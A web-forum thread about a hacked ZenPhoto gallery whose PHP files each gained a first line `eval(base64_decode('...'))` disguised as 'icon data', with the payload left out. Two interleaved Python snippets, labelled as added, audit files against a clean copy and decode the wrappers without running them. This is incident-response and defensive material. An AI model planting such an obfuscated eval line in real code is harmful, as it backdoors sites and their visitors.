I just heard from a client that a ZenPhoto gallery I installed for them a while back is suddenly displaying a whole lot of code, and when I checked it, I found this:
```
Notice: Undefined index: testorrr in /[path to web directory]/gallery/zp-core/lib-GD.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 1
Notice: Undefined index: testorrr in /[path to web directory]/gallery/zp-core/lib-utf8.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 1
Notice: Undefined index: testorrr in /[path to web directory]/gallery/zp-core/version.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 1
```
And so on through a couple of dozen more repetitions, each with different filenames listed (where "[path to web directory]" is the actual path to their web directory, which I've edited out for security reasons).
I've never seen anything quite like this, and have no idea what might be causing it. I upgraded the site to 1.2.4 back in May, but haven't done anything to it since, and it seemed fine after the upgrade. The client says they haven't changed anything, and no files appear to have been modified since May as far as I can see. My web host did move my account to a new server shortly after that, but I don't think that *should* have messed anything up, and in any event it was a month and a half ago and the client is only just reporting this problem now (though I don't actually know how often they check their gallery).
I checked some of the files that were triggering the error, and the string "testorrr" doesn't seem to appear in any of them. I tried searching the gallery database for it and it wasn't in there either. I googled it, and mainly just found other broken sites displaying the same error. So I'm really kind of stuck...
Any ideas, anyone?
BTW, I tried disabling display of notices by adding `error_reporting(E_ALL ^ E_NOTICE);` to the top of index.php (as per this page in the PHP manual), but it had no effect.
Comments
Maybe check the permissions on files and folders, too.
I am guessing that some kind of change was made to the PHP configuration. The only `eval()` we do is in processing an image's EXIF/IPTC data, and then only on PHP5.
1. My web host says they have not made any PHP configuration changes recently,
2. Another ZenPhoto installation of the same version, on the same account, is not showing this problem at all, and
3. Most disturbing: when I saw sbillard's comment about only using eval() when processing the EXIF data, I thought "But I'm sure I saw it in the files I checked," and took another look. And every file that I checked had the following as the first line:
`<?php /*Packed BLOB icon data. Corruption may result script execution errors. Don't touch it unless you know what you are doing.*/ eval(base64_decode('...'));?>`
Then I checked my local copy of the ZP files, and voila, no such line in any of them! Checked the ZP installation - also no such line.
So this is starting to look disturbingly like a security breach of some sort. I'm going to change my SFTP password and any other passwords associated with the site, and re-upload the ZP files from my local copies - if anyone has any other suggestions, I'd be very thankful...
The weirdest thing is, the last-modified dates of the files are all still set to when I did the last upgrade! Nothing looks as though it's been changed recently. So if someone somehow got in and changed the files, they somehow did it without the modification dates changing, and I didn't think that was possible. :-(
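An added example, not part of the original thread: because the modification dates here could not be trusted, a deployed tree can instead be compared against a known-clean copy by content hash, with the first-line `eval(base64_decode(` shape quoted above flagged directly. The names `audit` and `demo`, the directory layout and the sample files are assumptions constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# First-line shape quoted in the thread: opening tag, optional comment, then
# eval(base64_decode( ... on the same line.
INJECTED = re.compile(rb"^<\?php\s*(/\*.*?\*/)?\s*eval\s*\(\s*base64_decode\s*\(")

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def audit(deployed_root, clean_root):
    """Return {relative_path: reason} for .php files that look tampered with.

    Content is compared by hash, not by date, because the injected files in
    the thread still carried their old last-modified timestamps.
    """
    deployed_root, clean_root = Path(deployed_root), Path(clean_root)
    findings = {}
    for path in sorted(deployed_root.rglob("*.php")):
        rel = path.relative_to(deployed_root).as_posix()
        clean = clean_root / rel
        with path.open("rb") as fh:
            first_line = fh.readline()
        if INJECTED.match(first_line):
            findings[rel] = "eval(base64_decode( on first line"
        elif not clean.is_file():
            findings[rel] = "not in clean copy"
        elif sha256(path) != sha256(clean):
            findings[rel] = "differs from clean copy"
    return findings

def demo():
    """Run audit() on constructed trees: one injected file, one edited file."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            (root / "zp-core").mkdir(parents=True)
            (root / "index.php").write_bytes(b"<?php echo 'ok'; ?>\n")
            (root / "zp-core/version.php").write_bytes(b"<?php $v = 1; ?>\n")
            (root / "zp-core/lib-GD.php").write_bytes(b"<?php function gd() {} ?>\n")
        # Constructed stand-in for the injected line; 'MTs=' is base64 of "1;".
        bad = b"<?php /*constructed*/ eval(base64_decode('MTs='));?>\n"
        lib = live / "zp-core/lib-GD.php"
        lib.write_bytes(bad + lib.read_bytes())
        (live / "index.php").write_bytes(b"<?php echo 'changed'; ?>\n")
        return audit(live, clean)
```

Files that exist only on the server, such as a newly dropped script, are reported as "not in clean copy".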
But that indeed sounds like you got hacked. We do not know about security breaches in Zenphoto but of course that does not mean there might not still be some. But there are many possibilities like some custom JS used in your theme (I believe a custom one?) or simply via the server itself.
Anyway, if you find anything out let us know.
But I've alerted my host to this, and I'm hoping they can figure something out. In the meantime, I've archived the modified files and replaced them with clean copies, which seems to have fixed the problem.
I did find one other odd thing: in the site's root web directory (not the gallery directory), there were two files called favicon.ico and favicon.gif that I did not put there. Now, I know what favicon files normally are, but given that I didn't put them there, and they both had fairly recent last-modified dates - more recent than the last time I did anything with the site - I'm suspicious that they might actually be something else. I downloaded them and tried to force them to open in a text editor to see if they might actually contain some kind of code that was just disguised as an image file, but they both appear to be empty files of zero bytes.
I also tried to see if I could decode the block of base-64-encoded text in the eval statements by adding ob_start() before running it and ob_get_contents() to capture the buffer contents to a string, and then print the string, but that just got me a blank page. Not sure if I did something wrong - I'm reasonably conversant with PHP, but I haven't got much experience with the output buffer functions.
In case anyone else should happen to run into this particular problem, there are some details available here: http://www.zen-cart.com/forum/showthread.php?p=768035
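An added example, not part of the original thread: the injected first line can be read without running it by decoding each `eval(base64_decode('...'))` wrapper as text, so unknown code is never executed the way it is when the line is run under output buffering. `peel`, `wrap` and `SAMPLE` are hypothetical names, and the sample is constructed with a harmless payload; pass only the injected first line of a file.

```python
import base64
import re

# One layer: optional PHP open tag and leading comment, a single
# eval(base64_decode('...')) statement, optional close tag.
LAYER = re.compile(
    r"""^\s*(?:<\?php)?\s*(?:/\*.*?\*/)?\s*
        eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*;?
        \s*(?:\?>)?\s*$""",
    re.S | re.X,
)

def peel(php_source, max_layers=32):
    """Decode nested eval(base64_decode()) wrappers as text; nothing is executed.

    Returns (layers_removed, innermost_source). Stops at the first layer that
    is not a plain base64 wrapper, which is then left for manual reading.
    """
    layers = 0
    while layers < max_layers:
        m = LAYER.match(php_source)
        if not m:
            break
        php_source = base64.b64decode(m.group(2)).decode("utf-8", "replace")
        layers += 1
    return layers, php_source

def wrap(php_code, depth):
    """Build a constructed sample: `depth` wrappers around harmless code."""
    for _ in range(depth):
        b64 = base64.b64encode(php_code.encode()).decode()
        php_code = f"eval(base64_decode('{b64}'));"
    return php_code

# Constructed input: seven layers, matching the seven "eval()'d code" levels
# in the notices, around a harmless statement.
SAMPLE = "<?php /*constructed sample*/ " + wrap("echo 'innermost layer';", 7) + "?>"

if __name__ == "__main__":
    depth, inner = peel(SAMPLE)
    print(depth, inner)
```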